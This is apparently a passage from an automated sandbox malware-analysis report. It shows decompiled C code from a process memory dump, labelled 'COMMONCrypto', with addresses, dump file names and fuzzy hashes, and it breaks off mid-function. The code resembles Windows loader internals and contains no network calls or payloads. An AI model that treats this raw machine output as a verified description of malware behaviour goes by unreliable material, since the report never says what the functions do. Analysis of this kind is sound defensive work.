COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E04AE20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x4ba8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E04AE2EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E04AE2EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E04AB58EC(_t240);
									_t221 =  *0x4ba5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x4ba5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E04AF4A2C(0x4ba6e40, 0x4af4b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E04AD7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x4a95c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E04AEF6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E04AEF6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E04B37016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L04AD2400(_t267 + 0x20);
															}
															L04AD2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E04AE2397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E04AD2280(_t134, 0x4ba8608);
									__eflags =  *0x4ba6e48 - _t253; // 0x960cd0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E04ACFFB0(_t198, _t241, 0x4ba8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x4ba6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x4ba8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E04AE6B90(_t210,  &_v64);
										_t262 =  *0x4ba8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E04AEE180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E04AF97C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E04AF006A(0x4ba8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x4ba8608);
												E04AFB180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x4ba6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x4ba6e48; // 0x960cd0
							_v72 = _t229;
							if(_t229 == 0) {
								L45:
								E04ACFFB0(_t198, _t240, 0x4ba8608);
								_t253 = _v76;
								goto L29;
							}
							if( *((char*)(_t229 + 0x40)) != 0) {
								L13:
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E04AF00C2(0x4ba8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
							_t18 = _t229 + 0x38; // 0x0
							if( *_t18 !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								goto L45;
							}
							goto L13;
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x04ae20a0
0x04ae20a8
0x04ae20ad
0x04ae20b3
0x04ae20b8
0x04ae20c2
0x04ae20c7
0x04ae20cb
0x04ae20d2
0x04ae2263
0x04ae2266
0x04b25836
0x04b25836
0x00000000
0x04ae226c
0x04ae226c
0x04ae2270
0x04ae2274
0x04ae20e2
0x04ae20e2
0x04ae20e6
0x04ae20ee
0x04b257dc
0x04b257de
0x04b257ec
0x04b257ec
0x04b257f1
0x04b257f3
0x04b257f8
0x00000000
0x04b257f8
0x04b257e0
0x04b257e4
0x04b257ea
0x00000000
0x00000000
0x00000000
0x04b257ea
0x04ae20f4
0x04ae20f4
0x04ae20f8
0x04ae20f8
0x04ae20fc
0x04ae2100
0x04ae2106
0x04ae2201
0x04ae2206
0x04ae220b
0x04ae220e
0x04ae22a9
0x04ae22ac
0x00000000
0x00000000
0x04ae22b2
0x04ae22b5
0x04b25801
0x04b25806
0x00000000
0x00000000
0x04b25810
0x04b25815
0x04b25818
0x00000000
0x00000000
0x04b2581e
0x04ae22bb
0x04ae22bb
0x04ae2218
0x04ae2218
0x04ae221c
0x04ae2220
0x04ae2222
0x04ae22c2
0x04ae22c4
0x04ae22dc
0x04ae22dc
0x04ae22e1
0x00000000
0x00000000
0x00000000
0x04ae22e7
0x04ae22c8
0x04ae22cd
0x04ae22d3
0x04ae22d6
0x04b25823
0x04b25825
0x04b25827
0x00000000
0x00000000
0x04b2582d
0x00000000
0x04b2582d
0x00000000
0x04ae2228
0x04ae2228
0x00000000
0x04ae2228
0x04ae2222
0x04ae2214
0x04ae2214
0x00000000
0x04ae2114
0x04ae2114
0x04ae2114
0x04ae211a
0x04ae211c
0x04ae2348
0x04ae234d
0x04b25840
0x04b25845
0x04b25848
0x04b2584e
0x04b2584e
0x04b25848
0x04ae2353
0x04ae2355
0x04ae2388
0x04ae2388
0x04ae2368
0x04ae236a
0x04ae236c
0x04ae238f
0x00000000
0x04ae236e
0x04ae236e
0x04ae218e
0x04ae218e
0x04ae2191
0x04ae2195
0x04b25a03
0x04b25a06
0x04b25a0c
0x04b25a0f
0x04b25a11
0x04b25a13
0x04b25a13
0x04b25a19
0x04b25a1f
0x00000000
0x04ae219b
0x04ae219b
0x04ae21a0
0x04ae2282
0x04ae2284
0x04ae2284
0x04ae2284
0x04ae2284
0x04ae21a6
0x04ae21a9
0x04ae21ac
0x04ae21ae
0x04ae21b3
0x04ae228b
0x04ae2290
0x04ae2379
0x04ae2296
0x04ae2298
0x04ae2298
0x04ae2290
0x04ae21b9
0x04ae21be
0x04ae22a2
0x04ae22a2
0x04ae21c4
0x04ae21c8
0x04ae21cc
0x04ae21d0
0x04ae21d4
0x04ae21de
0x04ae21e3
0x04b25a29
0x04b25a2c
0x00000000
0x00000000
0x04b25a3b
0x00000000
0x04ae21e9
0x04ae21e9
0x04ae21e9
0x04ae21ee
0x04ae21f1
0x04b25a45
0x04b25a4b
0x04b25a52
0x04b25a58
0x04b25a5d
0x04b25a5f
0x04b25a71
0x04b25a61
0x04b25a6a
0x04b25a6a
0x04b25a76
0x04b25a79
0x04b25a7f
0x04b25a83
0x04b25a85
0x04b25a87
0x04b25a87
0x04b25a8c
0x04b25a91
0x04b25a97
0x04b25a9f
0x04b25aa0
0x04b25aa1
0x04b25aa6
0x04b25aab
0x04b25ab1
0x04b25ab3
0x04b25ab9
0x04b25aca
0x04b25ad4
0x04b25ad4
0x04b25ade
0x04b25ade
0x04b25aab
0x04b25a79
0x04b25a52
0x04ae21f7
0x04ae21f9
0x04ae21fe
0x04ae21fe
0x04ae21e3
0x04ae2195
0x04ae236c
0x04ae2122
0x04ae2122
0x04ae2124
0x04ae2231
0x04ae2236
0x04ae2236
0x04ae2238
0x04ae2238
0x04ae2240
0x04ae2242
0x04ae2244
0x04b259fc
0x04ae218c
0x04ae218c
0x00000000
0x04ae218c
0x04ae224a
0x04ae224f
0x04ae2256
0x04ae2304
0x04ae2309
0x04ae230f
0x04ae231e
0x04ae231e
0x04ae231e
0x04ae2320
0x04ae2325
0x04ae232a
0x04ae232c
0x04ae233e
0x04ae233e
0x00000000
0x04ae232c
0x04ae2311
0x04ae2317
0x04ae231a
0x04ae231c
0x04ae2380
0x04ae2380
0x04ae2380
0x04ae2384
0x00000000
0x00000000
0x04ae2386
0x00000000
0x04ae231c
0x04ae225c
0x04ae225c
0x00000000
0x04ae225c
0x04ae212a
0x04ae2134
0x04ae2138
0x04ae213d
0x04b25858
0x04b25863
0x04b25863
0x04b25867
0x04b2586a
0x00000000
0x00000000
0x04b2586c
0x04b2586c
0x04b25871
0x04b25875
0x04b25877
0x04b25997
0x04b2599c
0x04b259a1
0x04b259a7
0x04b259a7
0x00000000
0x04b259a7
0x04b2587d
0x00000000
0x04b2588b
0x04b2588b
0x04b25890
0x04b25892
0x04b25894
0x04b25899
0x04b2589b
0x04b258a0
0x04b258a0
0x04b258aa
0x04b258b2
0x04b258b6
0x04b258be
0x04b258c6
0x04b258c9
0x04b2590d
0x04b25917
0x04b2591a
0x04b2591c
0x04b25920
0x04b25928
0x04b2592a
0x04b2592c
0x04b2592e
0x04b2592e
0x04b258cb
0x04b258cd
0x04b258d8
0x04b258e0
0x04b258f4
0x04b258fe
0x04b258fe
0x04b2593a
0x04b2593e
0x04b25940
0x04b25942
0x00000000
0x04b25944
0x04b25944
0x04b25949
0x04b2594e
0x04b2594e
0x04b25953
0x04b2595b
0x04b25976
0x04b25976
0x04b2597a
0x04b2597f
0x00000000
0x00000000
0x00000000
0x00000000
0x04b25981
0x04b25981
0x04b25981
0x04b25983
0x04b25988
0x04b2598d
0x04b25991
0x04b25991
0x00000000
0x04b2595d
0x04b2595d
0x04b25963
0x04b25965
0x00000000
0x00000000
0x00000000
0x00000000
0x04b25967
0x04b25967
0x04b2596b
0x04b2596d
0x00000000
0x00000000
0x04b2596f
0x04b25971
0x04b25971
0x04b25974
0x00000000
0x00000000
0x00000000
0x04b25974
0x00000000
0x04b25967
0x04b2595b
0x04b25942
0x04b25863
0x04ae2143
0x04ae2143
0x04ae2149
0x04ae214f
0x04ae22ec
0x04ae22f1
0x04ae22f6
0x00000000
0x04ae22f6
0x04ae2159
0x04ae2173
0x04ae2173
0x04ae217d
0x04ae2181
0x04ae2186
0x04b259ae
0x04b259b2
0x04b259b5
0x04b259b7
0x04b259ba
0x04b259cd
0x04b259d1
0x04b259d5
0x04b259d9
0x04b259db
0x00000000
0x00000000
0x04b259dd
0x04b259dd
0x04b259e1
0x04b259e4
0x04b259e7
0x04b259ee
0x04b259ee
0x04b259f3
0x04b259f3
0x00000000
0x04ae2186
0x04ae2164
0x04ae216d
0x00000000
0x00000000
0x00000000
0x04ae216d
0x04ae2106
0x04ae2266
0x04ae20d8
0x04ae20da
0x04ae20e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97bcdfc02f0b81160198d5b6b33e25ac5346d29f416be3cc50bce81988aae4d5
Instruction ID: 1fcf5815cf0b705e3bd71e0a5a439f3a041ff29a2b380fac23b80b8b0fed1aef
Opcode Fuzzy Hash: 97bcdfc02f0b81160198d5b6b33e25ac5346d29f416be3cc50bce81988aae4d5
Instruction Fuzzy Hash: 2FF12A72609351AFE735CF29C54077A77E9EF85314F08899DE8A98B280D735F841CB52

Uniqueness

Uniqueness Score: -1.00%

Function 04ACD5E0, Relevance: .4, Instructions: 353
COMMONCrypto

Download Yara Rule

C-Code - Quality: 87%

			E04ACD5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				intOrPtr _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				intOrPtr _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				intOrPtr* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x4bad360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E04AC6600(0x4ba52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x4ba7b9c; // 0x0
							_t281 = L04AD4620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E04AFF3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x4ba7b90; // 0x779c0000
								if(_t384 == 0) {
									_t353 =  *0x4ba7b8c; // 0x952ae8
									_v176 = _t353;
									_t63 = _t353 + 0x50; // 0x952b98
									_t64 =  *_t63 + 0x20; // 0x9
									_t320 =  *_t64;
									_v184 = _t320;
								} else {
									E04AD2280(_t200, 0x4ba84d8);
									_t277 =  *0x4ba85f4; // 0x952fd8
									_t351 =  *0x4ba85f8 & 1;
									while(_t277 != 0) {
										_t21 = _t277 - 0x50; // 0x75130000
										_t337 =  *_t21;
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t23 = _t277 - 0x18; // 0x953020
													_t340 =  *_t23;
													_t24 = _t277 - 0x68; // 0x952f70
													_t353 = _t24;
													_v176 = _t353;
													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t30 = _t353 + 0x50; // 0x953020
															_t340 =  *_t30;
														}
													}
													_t31 = _t340 + 0x20; // 0x9
													_v184 =  *_t31;
												}
											} else {
												_t22 = _t277 + 4; // 0x953330
												_t339 =  *_t22;
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
													} else {
														L118:
														_t277 = _t277 ^ _t339;
														goto L17;
													}
													goto L151;
												} else {
													L16:
													_t277 = _t339;
												}
												goto L17;
											}
										}
										goto L25;
										L17:
									}
									L25:
									E04ACFFB0(_t287, _t353, 0x4ba84d8);
									_t320 = _v184;
									_t342 = 0x1000;
								}
								if(_t353 == 0) {
									break;
								} else {
									_t366 = 0;
									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
										_t288 = _v164;
										if(_t353 != 0) {
											_t342 = _t288;
											_t374 = E04B0CC99(_t353, _t288, _v200, 1,  &_v168);
											if(_t374 >= 0) {
												if(_v184 == 7) {
													__eflags = _a20;
													if(__eflags == 0) {
														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
														if(__eflags != 0) {
															_t271 = E04AC6600(0x4ba52d8);
															__eflags = _t271;
															if(__eflags == 0) {
																_t342 = 0;
																_v169 = _t271;
																_t374 = E04AC7926( *(_t353 + 0x50), 0,  &_v169);
															}
														}
													}
												}
												if(_t374 < 0) {
													_v168 = 0;
												} else {
													if( *0x4bab239 != 0) {
														_t342 =  *(_t353 + 0x18);
														E04B3E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
													}
													if( *0x4ba8472 != 0) {
														_v192 = 0;
														_t342 =  *0x7ffe0330;
														_t361 =  *0x4bab218; // 0x0
														asm("ror edi, cl");
														 *0x4bab1e0( &_v192, _t353, _v168, 0, _v180);
														 *(_t361 ^  *0x7ffe0330)();
														_t269 = _v192;
														_t353 = _v176;
														__eflags = _t269;
														if(__eflags != 0) {
															_v168 = _t269;
														}
													}
												}
											}
											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
												_t366 = 0xc000007a;
											}
											_t247 =  *(_t353 + 0x50);
											if(_t247[3] == 0xffffffff) {
												L40:
												if(_t366 == 0xc000007a) {
													__eflags = _t288;
													if(_t288 == 0) {
														goto L136;
													} else {
														_t366 = 0xc0000139;
													}
													goto L54;
												}
											} else {
												_t249 =  *_t247;
												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
													goto L40;
												} else {
													_t250 = _t249 | 0xffffffff;
													asm("lock xadd [edi+0x9c], eax");
													if((_t249 | 0xffffffff) == 0) {
														E04AD2280(_t250, 0x4ba84d8);
														_t342 =  *(_t353 + 0x54);
														_t165 = _t353 + 0x54; // 0x54
														_t252 = _t165;
														__eflags =  *(_t342 + 4) - _t252;
														if( *(_t342 + 4) != _t252) {
															L135:
															asm("int 0x29");
															L136:
															_t288 = _v200;
															_t366 = 0xc0000138;
															L54:
															_t342 = _t288;
															L04AF3898(0, _t288, _t366);
														} else {
															_t324 =  *(_t252 + 4);
															__eflags =  *_t324 - _t252;
															if( *_t324 != _t252) {
																goto L135;
															} else {
																 *_t324 = _t342;
																 *(_t342 + 4) = _t324;
																_t293 =  *(_t353 + 0x50);
																_v180 =  *_t293;
																E04ACFFB0(_t293, _t353, 0x4ba84d8);
																__eflags =  *((short*)(_t353 + 0x3a));
																if( *((short*)(_t353 + 0x3a)) != 0) {
																	_t342 = 0;
																	__eflags = 0;
																	E04AF37F5(_t353, 0);
																}
																E04AF0413(_t353);
																_t256 =  *(_t353 + 0x48);
																__eflags = _t256;
																if(_t256 != 0) {
																	__eflags = _t256 - 0xffffffff;
																	if(_t256 != 0xffffffff) {
																		E04AE9B10(_t256);
																	}
																}
																__eflags =  *(_t353 + 0x28);
																if( *(_t353 + 0x28) != 0) {
																	_t174 = _t353 + 0x24; // 0x24
																	E04AE02D6(_t174);
																}
																L04AD77F0( *0x4ba7b98, 0, _t353);
																__eflags = _v180 - _t293;
																if(__eflags == 0) {
																	E04AEC277(_t293, _t366);
																}
																_t288 = _v164;
																goto L40;
															}
														}
													} else {
														goto L40;
													}
												}
											}
										}
									} else {
										L04ACEC7F(_t353);
										L04AE19B8(_t287, 0, _t353, 0);
										_t200 = E04ABF4E3(__eflags);
										continue;
									}
								}
								L41:
								if(_v157 != 0) {
									L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
								}
								if(_t366 < 0) {
									L46:
									 *_v212 = _v168;
									_t204 = _t366;
									L47:
									_pop(_t354);
									_pop(_t367);
									_pop(_t289);
									return E04AFB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
								} else {
									_t206 =  *0x4bab2f8; // 0x1680000
